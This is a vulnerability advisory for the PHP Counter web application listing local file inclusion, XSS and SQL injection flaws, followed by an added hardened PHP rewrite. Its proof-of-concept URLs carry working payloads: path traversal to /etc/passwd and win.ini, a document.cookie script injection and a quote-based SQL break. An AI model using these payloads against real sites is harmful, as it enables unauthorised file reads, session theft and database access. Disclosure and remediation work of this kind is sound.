PHP Counter 1.3.X/1.2.X LFI/XSS/SQLi Vulnerabilities

Author: TUNISIAN CYBER, Published: 07-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: PHP Counter 1.3.X/1.2.X LFI/XSS/SQLi Vulnerabilities
[+] Date: 07-01-14
[+] Category: WebApp
[+] Version(s): 1.3.X/1.2.X
[+] Google Dork: Use your mind
[+] Tested on: KaliLinux
[+] Vendor: http://acalproj.sourceforge.net/

########################################################################################

+Description:
A multi-account real time web-site counter in PHP/MySQL with lots of different statistics of the visitors.

+Exploit:

PHP Counter suffers from LFI, XSS and SQLi vulnerabilities:

1/LFI:

File(s): defs.php : Line(s) 70
Parameter: l

[PHP]
@include("langs/$_GET[l].php");
[/PHP]

P.O.C:
Win Servers:
127.0.0.1/phpcounter.x.x.x/defs.php?l=../../../../../../../../../../windows/win.ini%00.php&name={name}

Linux Servers:
127.0.0.1/phpcounter.1.3.1/defs.php?l=../../../../../../../../../../etc/passwd%00.php&name={name}

2/ XSS:
P.O.C
127.0.0.1/phpcounter.1.3.1/index.php?l=en&name=Smith&action=3&page='"--></style></script><script>alert(document.cookie)</script>

3/ SQLi

File(s): index.php : Line(s) 70-71
Parameter: name

[PHP]
$rs = mysql_query("select * from phpcounters where name='$_GET[name]'");
$row = mysql_fetch_array($rs);
[/PHP]

P.O.C
127.0.0.1/phpcounter.1.3.1/index.php?name=1'
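As an added hardening example (not PHP Counter's own code), the two snippets quoted above rewritten so that the l and name parameters can no longer reach include() or the query unchecked, plus output encoding for the reflected page value. It assumes an existing PDO connection in $pdo, the phpcounters table and name column from the advisory, and a constructed allow-list of language codes.

```php
<?php
// Added example, not code from PHP Counter. Assumes $pdo is an open PDO
// connection and that langs/<code>.php files exist for the codes listed below.

// 1) LFI fix (defs.php): never build an include path from raw input.
//    Only allow-listed constants reach include(), so "../" and "%00" are irrelevant.
function load_language(string $requested): string
{
    $allowed = ['en', 'fr', 'de'];            // constructed list of shipped languages
    $code = in_array($requested, $allowed, true) ? $requested : 'en';
    require __DIR__ . '/langs/' . $code . '.php';
    return $code;
}

// 2) SQLi fix (index.php): prepared statement instead of string concatenation.
//    The mysql_* extension used in the original is removed in PHP 7; PDO replaces it.
function fetch_counter(PDO $pdo, string $name): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM phpcounters WHERE name = :name');
    $stmt->execute([':name' => $name]);       // value is bound, never parsed as SQL
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3) XSS fix: encode reflected input on output so <script> renders as text.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$lang = load_language((string) ($_GET['l'] ?? 'en'));
$row  = fetch_counter($pdo, (string) ($_GET['name'] ?? ''));
if ($row === null) {
    http_response_code(404);
    exit('unknown counter');
}
echo '<p>Language: ' . html($lang) . '</p>';
echo '<p>Page: ' . html((string) ($_GET['page'] ?? '')) . '</p>';
```

Stripping NUL bytes alone does not address the include issue; the allow-list is what removes the directory traversal, and the prepared statement is what removes the injection regardless of the quoting the attacker supplies.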

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################